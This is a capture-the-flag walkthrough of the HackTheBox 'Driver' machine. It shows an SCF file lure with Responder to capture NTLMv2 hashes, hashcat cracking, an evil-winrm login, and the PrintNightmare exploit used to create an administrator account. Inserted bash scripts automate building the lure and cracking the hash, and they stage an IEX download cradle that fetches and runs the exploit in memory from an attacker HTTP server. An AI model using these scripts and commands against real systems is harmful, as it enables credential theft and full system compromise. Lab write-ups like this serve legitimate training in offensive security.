In this post, I would like to share a walkthrough of the Driver machine from HackTheBox.

This machine is rated Easy on HackTheBox.

Source: HackTheBox

What will you gain from the Driver machine?

For the user flag, you will upload an SCF file so that the machine authenticates to your SMB listener, capture tony's NTLMv2 hash with Responder and crack it to recover his password.

For the root flag, you will run a PrintNightmare exploit against the Print Spooler service.

Information Gathering

Once we are connected to the VPN (the .ovpn file is downloaded from HackTheBox), we can start the information gathering on the machine by running nmap -sC -sV -p- -Pn <IP Address>

Let’s try to access the website interface

We are asked for a username and password to log in to the Dashboard. My first guess for the credentials is admin:admin.

## Some readers may wonder how I got the username admin. If you look carefully, the login prompt says "Please enter a password for admin". ##

With that, we are logged in to the Dashboard.

Gaining Initial Access

On the menu bar, there is nothing of use except the Firmware Updates function, which leads to a page that asks us to upload a firmware update for the printer.

From the search results, I notice that most methods use Metasploit, which I try to avoid. However, I found a page that explains how to exploit this without Metasploit.

Source: SMB Relay – Penetration Testing Lab (pentestlab.blog)

As a result, we need to create a file in SCF format, as shown in the screenshot above. When someone browses the folder where our upload lands, Windows Explorer tries to fetch the icon referenced by the SCF file from our SMB server and authenticates to it with the user's NTLMv2 credentials.

The only line that needs changing is the IconFile path: \\<Your IP Address>\share\<anyname>.ico

Let's start Responder with "sudo responder -wrf --lm -v -I tun0"; the tool will then sit at "Listening for events...".

Once Responder is running, we can upload the SCF file through the firmware update form and click "Submit".

After a while, Responder has captured a number of NTLMv2 hashes, all of them for the user tony.

Let's save the first hash to a file and try to crack it with hashcat: "hashcat -m 5600 -a 0 <hash file> /<your file location that stored the rockyou>/rockyou.txt" (-m 5600 is the NetNTLMv2 mode, -a 0 is a straight wordlist attack).

Finally, we have the password for tony, which is liltony.

Let's log in to the machine with evil-winrm: evil-winrm -i 10.10.11.106 -u tony -p liltony

We can read the user flag with "type C:\Users\tony\Desktop\user.txt".
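The SCF lure, the hash triage and the hashcat step above, as one attacker-side script. This is an added example, not code from the original post or from the pentestlab article: ATTACKER_IP (10.10.14.5), the share and file names and the sample capture lines are assumptions or constructed data, and the Responder and hashcat invocations only run when those tools and rockyou.txt are actually present.

```shell
#!/usr/bin/env bash
# Added example, not code from the original post. Attacker-side helpers for
# the SCF lure -> Responder capture -> hashcat step. ATTACKER_IP, SHARE_NAME,
# the file names and the sample capture below are assumptions / constructed.
set -eu

ATTACKER_IP="${ATTACKER_IP:-10.10.14.5}"   # assumption: your tun0 address
SHARE_NAME="${SHARE_NAME:-share}"          # any name works; Responder answers for every share
WORDLIST="${WORDLIST:-/usr/share/wordlists/rockyou.txt}"

# Build the SCF lure. Explorer resolves IconFile as soon as the upload folder
# is browsed, so the machine authenticates to our SMB listener and leaks an
# NTLMv2 response. CRLF line endings, as Windows expects.
make_scf() {
  local out="$1" ip="$2" share="$3"
  printf '[Shell]\r\nCommand=2\r\nIconFile=\\\\%s\\%s\\lure.ico\r\n[Taskbar]\r\nCommand=ToggleDesktop\r\n' \
    "$ip" "$share" > "$out"
}

# Read back the IconFile value (CR stripped) to sanity-check the lure.
scf_icon_path() {
  tr -d '\r' < "$1" | sed -n 's/^IconFile=//p'
}

# Responder with the flags used in the post (--lm is two dashes). Not called
# automatically: it needs root and a live tun0.
start_responder() {
  sudo responder -wrf --lm -v -I tun0
}

# Constructed sample in the one-hash-per-line format Responder writes to
# logs/SMB-NTLMv2-SSP-<ip>.txt. The hex is made up and will not crack.
SAMPLE_CAPTURE='tony::DRIVER:1122334455667788:0123456789abcdef0123456789abcdef:0101000000000000aabbccdd
tony::DRIVER:8877665544332211:fedcba9876543210fedcba9876543210:0101000000000000eeff0011'

# Responder logs one line per SMB connection; hashcat only needs one of them.
first_hash_for() {
  local user="$1" capture="$2"
  grep -m1 "^${user}::" "$capture"
}

count_hashes_for() {
  grep -c "^$1::" "$2"
}

# -m 5600 = NetNTLMv2, -a 0 = straight wordlist attack.
crack() {
  local hashfile="$1" wordlist="$2"
  if ! command -v hashcat >/dev/null 2>&1 || [ ! -r "$wordlist" ]; then
    echo "skipping crack: need hashcat and $wordlist; the command would be:" >&2
    echo "hashcat -m 5600 -a 0 $hashfile $wordlist" >&2
    return 0
  fi
  hashcat -m 5600 -a 0 "$hashfile" "$wordlist" --quiet || true   # exit 1 just means exhausted
  hashcat -m 5600 "$hashfile" --show
}

main() {
  local work
  work="$(mktemp -d)"
  make_scf "$work/lure.scf" "$ATTACKER_IP" "$SHARE_NAME"
  echo "SCF IconFile -> $(scf_icon_path "$work/lure.scf")"
  printf '%s\n' "$SAMPLE_CAPTURE" > "$work/capture.txt"
  echo "captured $(count_hashes_for tony "$work/capture.txt") hash(es) for tony"
  first_hash_for tony "$work/capture.txt" > "$work/tony.hash"
  crack "$work/tony.hash" "$WORDLIST"
}
main
```

Upload the generated lure.scf through the firmware form after calling start_responder in another terminal; once Responder has written its log, point first_hash_for at that file instead of the constructed sample.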

Escalate to Admin Privileges on Driver Machine

PrintNightmare Vulnerability

At last, I can test the PrintNightmare vulnerability on an HTB machine.

For those who are not familiar with PrintNightmare (CVE-2021-1675 / CVE-2021-34527, a Windows Print Spooler flaw that allows local privilege escalation), you can look it up on the internet.

Firstly, download the PrintNightmare exploit by running "git clone https://github.com/calebstewart/CVE-2021-1675" on your own machine.

After that, we can upload CVE-2021-1675.ps1 to the HTB machine through the evil-winrm session.

Next, we load it with "Import-Module .\CVE-2021-1675.ps1".

Finally, we create a new local administrator with Invoke-Nightmare -NewUser "anything" -NewPassword "anything".

As a result, we can log in to the machine with the credentials we just created.

We should then be able to read the root flag with "type C:\Users\administrator\Desktop\root.txt".

Additional Information

In case we get an error when trying to import the .ps1 module on the HTB machine, we can instead download the file into memory on the machine using the IEX command shown below:
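An attacker-side helper for that download-cradle alternative, added here as an example (it is not from the original post or from the calebstewart repository): it clones the exploit, serves it over HTTP on the VPN interface, and prints the IEX one-liner to paste into the evil-winrm session so the script is evaluated in memory rather than uploaded and imported from disk. The IP, port and paths are assumptions.

```shell
#!/usr/bin/env bash
# Added example, not code from the original post. Stages the PrintNightmare
# script on the attacker box and builds the PowerShell download cradle.
# ATTACKER_IP, HTTP_PORT and the clone directory are assumptions.
set -eu

ATTACKER_IP="${ATTACKER_IP:-10.10.14.5}"   # assumption: your tun0 address
HTTP_PORT="${HTTP_PORT:-8000}"
REPO_URL="https://github.com/calebstewart/CVE-2021-1675"
SCRIPT_NAME="CVE-2021-1675.ps1"

# Clone once (shallow) and refuse to go on if the expected script is missing.
fetch_exploit() {
  local dir="$1"
  [ -d "$dir/.git" ] || git clone --depth 1 "$REPO_URL" "$dir"
  [ -f "$dir/$SCRIPT_NAME" ]
}

# Serve the clone on the VPN address only, so nothing else can reach it.
serve_dir() {
  local dir="$1" port="$2"
  (cd "$dir" && python3 -m http.server "$port" --bind "$ATTACKER_IP")
}

# PowerShell one-liner for the evil-winrm session: fetch the script text and
# evaluate it with IEX, so the functions are defined without touching disk.
cradle() {
  local ip="$1" port="$2" script="$3"
  printf "IEX(New-Object Net.WebClient).DownloadString('http://%s:%s/%s')\n" "$ip" "$port" "$script"
}

# Only stage when asked explicitly, since cloning needs network access.
if [ "${1:-}" = "stage" ]; then
  clone_dir="${2:-$HOME/CVE-2021-1675}"
  fetch_exploit "$clone_dir"
  echo "paste this into the evil-winrm session:"
  cradle "$ATTACKER_IP" "$HTTP_PORT" "$SCRIPT_NAME"
  serve_dir "$clone_dir" "$HTTP_PORT"
fi
```

Run it as "bash stage.sh stage" on the attacker machine, paste the printed line into the evil-winrm session, and then call Invoke-Nightmare with the -NewUser and -NewPassword values described above; the HTTP server keeps running in the foreground until you stop it.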
